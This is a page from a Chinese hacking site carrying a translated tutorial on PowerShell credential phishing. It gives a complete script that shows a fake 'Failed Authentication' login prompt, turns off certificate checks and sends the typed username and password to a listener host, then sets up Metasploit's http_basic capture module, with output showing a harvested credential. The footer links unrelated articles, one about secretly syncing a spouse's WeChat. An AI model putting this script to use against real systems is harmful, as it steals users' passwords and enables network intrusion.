找黑客平台

Powershell基础认证钓鱼与捕获

访客5年前黑客工具692

  本文是metasploitminute的课程 利用powershell生成一个基础认证钓鱼窗体,然后通过metasploit来capture捕获。

  最酷的是不生成额外代码,可以获取任何级别用户的认证信息,无需管理员权限,无需过UAC,通过SSL方式只需要一些免费的证书。

  渗透中不战而屈人之兵为上等,让管理员或者其他域用户拱手交出自己的密码当然是更好了。

  evilpopup_metasploit

  视频教程在此:

  powershell脚本代码:

  $cred=$host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};

  $wc=new-object net.webclient;

  $wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");

  $wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;

  $wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;

  $wc.credentials=new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');

  $result=$wc.downloadstring('https://172.16.102.163');

  分解一下:

  $cred=$host.ui.promptforcredential('Failed Authentication','',[Environment]::UserName,[Environment]::UserDomainName);

  这步告诉windows提示凭证,我们设置的标题是“Failed Authentication”(验证失败),在弹窗里面增加了用户名和域名来提过真实性。当然这一切,都只是辅助。

  [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};

  告诉powershell不要验证SSL证书(允许我们后续使用自签署的证书)

  $wc=new-object net.webclient;

  $wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");

  创建一个新的webclient对象并设置它的用户 *** 为Wget。

  $wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;

  $wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;

  告诉powershell使用当前用户可能在使用的任何 *** 及任何缓存的凭据。

  $wc.credentials=new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');

  用户在此基础认证钓鱼中输入的密码就是安全研究人员和黑客们想要的密码,对内网渗透十分有裨益。

  $result=$wc.downloadstring('https://172.16.102.163');

  最后发送请求到监听机器上 监听机器上使用metasploit的capture模块

  cat power.txt | iconv --to-code UTF-16LE | base64

  base64一下上述代码

  然后执行你就可以看到十分逼真的基础认证钓鱼窗口:

  2014-09-03-powershellpopup

  另外一边使用metasploit接收密码:

  root@wpad:~/metasploit-framework# https://www.secpulse.com/archives/msfconsole -Lq

  msf > use auxiliary/server/capture/http_basic

  msf auxiliary(http_basic) > show options

  Module options (auxiliary/server/capture/http_basic):

  Name Current Setting Required Description

  ---- --------------- -------- -----------

  REALM Secure Site yes The authentication realm you'd like to present.

  RedirectURL no The page to redirect users to after they enter basic auth creds

  SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

  SRVPORT 80 yes The local port to listen on.

  SSL false no Negotiate SSL for incoming connections

  SSLCert no Path to a custom SSL certificate (default is randomly generated)

  SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

  URIPATH no The URI to use for this exploit (default is random)

  msf auxiliary(http_basic) > set SSL true

  SSL=> true

  msf auxiliary(http_basic) > set SRVPORT 443

  SRVPORT=> 443

  msf auxiliary(http_basic) > set URIPATH /

  URIPATH=> /

  msf auxiliary(http_basic) > run

  [*] Auxiliary module execution completed

  msf auxiliary(http_basic) >

  [*] Listening on 0.0.0.0:443...

  [*] Using URL: https://0.0.0.0:443/

  [*] Local IP: https://172.16.102.163:443/

  [*] Server started.

  [*] 172.16.102.140 http_basic - Sending 401 to client 172.16.102.140

  [+] 172.16.102.140 - Credential collected: "SITTINGDUCKASDqwe123"=> /

  【原文:Powershell Popups + Capture SP小编翻译发布】

标签: Powershell基础认证钓鱼与捕获
返回列表

上一篇:【HTB系列】靶机Netmon的渗透测试

下一篇:SEO电子书下载(全套SEO教程电子书PDF)

相关文章

9月15日蚂蚁庄园今日答案最新公布 补钙就能长高吗为什么不一定

蚂蚁庄园小课堂9月15日答题答案今天是什么?补钙就能长高吗?正确回答就可以获得180g小鸡饲料哦。一起来看看今天蚂蚁庄园的答案吧。 今天的问题是: 补钙就能长高吗 答案:不一定 扩展阅读:...

qq群黑客(黑客入侵群)

qq群黑客(黑客入侵群)

本文导读目录: 1、QQ群软件是什么? 2、有些骗人的QQ群让你把消息转发至好几个群他们想干嘛 3、QQ群网课有人监视吗 4、只在QQ群里聊天会电脑会被入侵吗? 5、各位怎样攻击QQ群...

「黑帽seo培训网」西藏自治区seo培训课程

其他谜底:要害词优化此刻要是真的能做上去的话,结果照旧有的,但愿能辅佐你! …. 成都企业seo玖金手指花总二十:SEO培训那边较量专业一些,我成都的是? 其他谜底:你好!【西藏自治区seo培训课程】...

越南岘港旅游攻略及游玩注意事项!

越南岘港旅游攻略及游玩注意事项!

越南岘港,位于越南中部,对一般人而言可能比较陌生。其实这里是被誉为“东方夏威夷”的旅游城市,现代文明与自然人文完美结合。不仅有美国国家地理杂志评选的全球五十个人生必去的景点之一——灵姑湾,还有被福布斯...

专家教你怎么同步老婆的微信不被发现(同步微

11月15日,“Cheer App”华为应用市场2020能量季收官分享会走进苏州诚品书店。现场,华为应用市场携手特邀嘉宾带来关于数字时代网络文学创作的主题分享,带领大家一起了解读书写作那些事儿。...

狗狗衣服在家怎么做(闲置衣服做成狗狗服分享

狗狗衣服在家怎么做(闲置衣服做成狗狗服分享

相信大家家有一些过季或太小不要的衣服先别急着丢 可以给家里的狗狗穿或用 下面介绍5种DIY简易狗狗装 1.衬衫类 衬衫的领子是个很好的名牌项圈育 2.棉裤类 不要的缩口棉裤,是最简单的...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.